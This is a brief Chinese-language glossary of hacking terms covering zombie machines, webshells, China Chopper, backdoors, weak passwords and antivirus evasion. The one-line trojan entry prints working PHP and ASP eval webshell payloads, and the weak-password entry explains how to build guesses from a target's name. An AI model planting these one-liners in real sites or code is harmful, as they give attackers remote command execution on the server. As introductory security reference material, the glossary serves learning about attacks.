肉鸡
肉鸡也称傀儡机,是指可以被黑客远程控制的机器。通俗来讲就是中了木马或者留了后门,可以被黑客远程操纵的机器。
比如用"灰鸽子"等诱导客户点击或者电脑被黑客攻破或用户电脑有漏洞被种植了木马,黑客可以随意操纵它并利用它做任何事情。
webshell
webshell就是以asp、jsp、php或cgi等网页文件形式存在的一种命令执行环境,也可以将其称作为一种网页后门(木马后门)。
中国菜刀
中国菜刀是一个非常好用而又十分强大的webshell。(仅仅听说,我也没用过)
一句话木马
一句话木马主要用来配合菜刀食用
php:
<?php @eval($_POST['attack']);?>
asp:
<%eval request("attack")%>
Customize:自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
后门
后门(backdoor)一般指那些绕过安全性控制而获取对程序或系统访问权的方法。在软件开发阶段,程序员通常会在软件内留后门,方便以后修改程序设计中的缺陷。但如果这些后门被其他人知道,他就成为了安全风险,容易被黑客当成安全漏洞进行攻击。
归根结底目的是绕过安全控制,获取目标权限。
弱口令
弱口令(weak password)
例如123456,admin 等这些简单的,很容易被人破解的口令叫做弱口令。
弱口令是相对的,可以根据收集的信息来定制生成。
比如你叫张三,你用自己的名字作为后台管理密码,那类似zhangsan;
zhangsan123456;zhangsanadmin等就属于弱口令。
免杀
免杀的意思就是通过各种方式,绕过杀毒软件的拦截的过程。